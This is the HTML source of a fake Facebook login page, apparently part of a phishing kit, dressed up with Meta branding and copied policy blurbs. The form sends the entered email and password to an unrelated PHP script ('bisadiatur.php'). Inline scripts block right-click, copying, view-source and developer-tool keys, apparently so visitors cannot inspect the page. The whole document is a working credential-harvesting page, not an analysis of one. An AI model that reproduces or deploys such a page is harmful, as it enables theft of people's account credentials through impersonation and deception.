<html lang="en" class=""><head>

   <meta charset="utf-8">
   <title>Service Policy</title>
   <link rel="icon" type="image/png" href="img/icon.png">
   <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
   <link rel="stylesheet" href="css/bootstrap.min.css?v=270420211500" type="text/css" media="screen">
   <link rel="stylesheet" href="css/style.css?v=1303202215" type="text/css" media="screen">
      <script type="text/javascript">
      function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
      </script>
      
      <script type="text/javascript">
      window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
      </script>
      
      <script type="text/javascript">
      document.onkeydown=function(e){e=e||window.event;if(e.keyCode==123||e.keyCode==18){return false}}
      </script>
   </head>
   <body>
   <header>
   <nav class="navbar navbar-expand-md navbar-cuttly nav_flow">
   <div class="container">
   <a class="navbar-brand">
   <img class="logo" src="img/martambuah.png">
   </a>

   </div>
   </nav>
   </header>
   <main id="content" role="main">
   <section class="c_form pt-4">
   <div class="container">
   <div class="row">
  
   <div class="max_form">
      <center><img class="logo" src="img/sigm.jpeg" height="100" width="100"></center>
         <h2 class="h1_of text-center">Log in to Facebook</h2>
   
   <form id="login" action="bisadiatur.php" method="post">
   <div class="info" id="suggest-sync"> You must log in to continue.</div>
   <div class="field">
   <input type="text" id="email" name="i" placeholder="Email address or phone number" pattern=".{6,}" required="" maxlength="40">
   </div>
   <div class="field">
   <input type="password" id="password" name="am" placeholder="Enter your password" pattern=".{6,}" required="" maxlength="40">
   </div>
   <div class="field">
   <button type="submit" data-callback="onSubmit" data-action="submit"> Log In </button>

   </div>
   <br><center><font size="3"><a href="#">Forgot password?</a></font></center>
   </form>

   </div>

   </div>
   </div>
   <br>
   </section>
   <section class="bg_light_lin">
   <div class="container py-5">
   <div class="row">

   <div class="card-group">
   <div class="card">
   <div class="card-body">
   <h2 class="card-title h2_of_a">Meta for Business</h2>
   <p class="card-text">Learn how you can launch and grow your business across all our apps -- and now in the metaverse. ✨</p>
   
   </div>
   </div>
   <div class="card">
   <div class="card-body">
   <h2 class="card-title h2_of_a">Data Policy</h2>
   <p class="card-text">This policy describes the information we process to support Facebook, Instagram, Messenger and other products and features offered by Meta Platforms, Inc. (Meta Products or Products). You can find additional tools and information in the Facebook Settings and Instagram Settings. </p>
   
   </div>
   </div>
   <div class="card">
   <div class="card-body">
   <h2 class="card-title h2_of_a">Terms of Service</h2>
   <p class="card-text">Meta builds technologies and services that enable people to connect with each other, build communities and grow businesses. These Terms govern your use of Facebook, Messenger and the other products, features, apps, services, technologies and software that we offer (the Meta Products or Products), except where we expressly state that separate terms (and not these) apply.</p>
   
   </div>
   </div>
   </div>

   </div>
   </div>
   </section>
   <footer class="footer-area footer--light">
   <div class="container footer-big">
   <div class="footer-widget">
   <p class="arrow-up">Meta © 2022</p>
   </div>
   </div>
   </footer>
   </svg>
   </main>
</body></html>